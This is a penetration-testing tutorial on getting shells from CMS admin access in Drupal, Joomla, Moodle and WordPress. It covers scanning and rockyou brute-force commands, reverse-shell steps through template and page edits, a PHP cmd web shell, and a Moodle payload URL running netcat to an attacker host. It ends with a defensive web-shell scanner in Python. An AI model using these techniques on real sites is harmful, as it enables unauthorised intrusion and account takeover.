CMS Exploitation


Post covering information on Content Management Systems, scanning for any vulnerabilities present, and attack scenarios for various systems.

What is CMS?

CMS stands for Content Management System. In short, a CMS is used to manage the creation and modification of digital content. Some popular examples of CMS packages you may have heard of include WordPress, Joomla, Drupal and Moodle. All of these packages just so happen to be primarily written in the same language.


The two most common categories of CMS are Enterprise Content Management (ECM) and Web Content Management (WCM). For all of the Content Management Systems named above, it is usually very straightforward to get a shell once you have gained access to the user/admin interface with valid credentials.


CMS Scanning


# Generic fingerprinting
droopescan scan -u <url>

# Drupal
BlindElephant.py <url> drupal
droopescan scan drupal -u <url> -t <threads>

# CMSmap: identify the CMS, optionally with a login brute-force
cmsmap.py -t <url>
cmsmap.py -t <url> -u admin -p /root/rockyou.txt

# Joomla
BlindElephant.py <url> joomla
joomscan -u <url>

# WordPress (wpscan: --enumerate u = users, p = plugins, t = themes)
BlindElephant.py <url> wordpress
wpscan -u <ip>
wpscan -u <ip> --enumerate u
wpscan -u <ip> --log output.txt
wpscan -u <ip> --usernames <wordlist>
wpscan -u <ip> -U admin -w <wordlist>
wpscan -u <url> --threads 20 --wordlist /root/rockyou.txt --username admin
wpscan --url <url> -e vv,tt,u,ap,vp
wpscan -u <url> --enumerate t --enumerate p --enumerate u

# Nmap's WordPress enumeration script
nmap -sV --script http-wordpress-enum --script-args limit=25 <IP>


Drupal


Once you gain access to the Drupal admin interface, navigate to Modules and enable the checkboxes for Path and PHP filter.

Once this is complete, go to Content > Add Content > Basic Page. This creates a basic page in which we can write malicious code, and with the PHP filter enabled that code is executed by the server, which is what lets us spawn a reverse shell.

Simply give the page a title, paste in a malicious PHP payload (msfvenom/pentestmonkey etc.) and click Save; you will receive a reverse shell almost immediately. Besides this authenticated code execution, numerous vulnerabilities/PoCs exist on the web and are easily exploited.

Joomla


Getting a shell via the Joomla admin interface is just as easy as with Drupal; in fact, most CMSs share very similar weaknesses regarding authenticated file upload/code execution.

There are a few different ways to get a shell via the Joomla interface. I tend to use the template method: go to the Template Customiser, swap out the PHP for a malicious payload (msfvenom/pentestmonkey), start your nc listener, and when you click Template Preview you will get a shell.

Moodle


Moodle suffers from some serious vulnerabilities regarding SQL injection and code execution, which can be found on exploitdb/searchsploit.

There is a brilliant article written by Robin Peraglie that covers a popular RCE method once you have gained access to the Moodle teacher/admin interface. The method abuses a maths formula quiz component to obtain the equivalent of the notorious cmd web shell <?php echo system($_REQUEST['cmd']);?>, so you can execute system commands on the web server.

/*{a*/`$_GET[0]`;//{x}}   // php cmd formula equivalent

http://<IP>/moodle/question/question.php?returnurl=....&0=(nc <AttackerIP> <Port> -e /bin/sh)   // Execute nc rev shell on web server


Using this method we are able to get a shell as www-data and escalate our privileges to root. The article for this technique is a great read: Moodle RCE.

WordPress


Aside from the numerous WordPress plugin vulnerabilities that are easily exploitable (XSS, LFI, RFI, code execution, SQLi, unauthenticated file upload, etc.), the easiest way to get a shell once you are into the admin interface is as follows:

  • Go to the Appearance tab
  • Click on Editor
  • Select the 404.php file (or any .php file under the Templates tab)
  • Swap out the code and replace it with PHP reverse shell code (pentestmonkey PHP rev shell / msfvenom php/meterpreter/reverse_tcp etc.)
  • Browse to the location of the file and it will execute our reverse shell

In this scenario the theme in use was Twenty Twelve.


Simply going to the address of our modified 404.php file triggers the shell:

http://<ip>/wp-content/themes/twentytwelve/404.php

Have a netcat listener ready beforehand to receive the connection:

# nc -nlvp 443
listening on [any] 443 ...
connect to [AttackerIP] from (UNKNOWN) [VictimIP] 59617
...
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwned:/$ 

If you are running a CMS, enforce a strong password policy and keep admin credentials secure: every shell technique above starts from a valid login. Running the scanning tools mentioned earlier against your own site can identify critical security vulnerabilities, so regular assessments are vital to the security of your web applications.
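The Drupal, Joomla, Moodle and WordPress sections above all end with PHP that takes a command from the request and hands it to the system. As an added example that is not part of the original post, the Python scanner below walks a web root for exactly those constructs (a shell function fed from $_GET/$_POST/$_REQUEST, backtick execution of a request parameter as in the Moodle formula, eval of request data, and the socket-plus-/bin/sh shape of pentestmonkey-style reverse shells) so a defender can spot a tampered theme or template file. The sample web root, the "templates/example" path and the file bodies are constructed for the demo; note that Drupal PHP-filter content and Moodle formulas live in the database, so a file scan only sees them once the code lands on disk.

```python
import re
import tempfile
from pathlib import Path

# PHP web-shell constructs this post walks through: a shell function fed straight from
# request data, backtick execution of a request parameter, and an eval/base64 wrapper.
INDICATORS = {
    "request_to_shell": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    "backtick_request": re.compile(r"`[^`\n]*\$_(GET|POST|REQUEST)\b[^`\n]*`"),
    "eval_of_request": re.compile(r"\beval\s*\(\s*(base64_decode\s*\(\s*)?\$_(GET|POST|REQUEST)\b", re.I),
}

def scan_text(text):
    """Return the names of all indicators present in one file's contents."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Classic PHP reverse shells open a raw socket and hand it an interactive shell.
    if "fsockopen(" in text and re.search(r"/bin/(ba)?sh\b", text):
        hits.append("socket_reverse_shell")
    return hits

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and map each suspicious PHP file (relative path) to its hits."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample web root (not a real site): the theme 404.php edited into the
# one-liner quoted in the Moodle section, a Joomla-style template file carrying a
# pentestmonkey-shaped socket shell, and an untouched theme file as a control.
SAMPLES = {
    "wp-content/themes/twentytwelve/404.php": "<?php echo system($_REQUEST['cmd']); ?>",
    "templates/example/index.php": "<?php $s = fsockopen($ip, $port); $p = proc_open('/bin/sh -i', $d, $pipes); ?>",
    "wp-content/themes/twentytwelve/functions.php": "<?php add_action('init', 'twentytwelve_setup'); ?>",
}

def demo():
    """Write the constructed samples to a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(tmp)
```

Point scan_tree at a real document root to get a dict of flagged files; comparing that output against a known-good copy of the theme or template directory is a quick way to confirm an edit made through the Appearance Editor or Template Customiser.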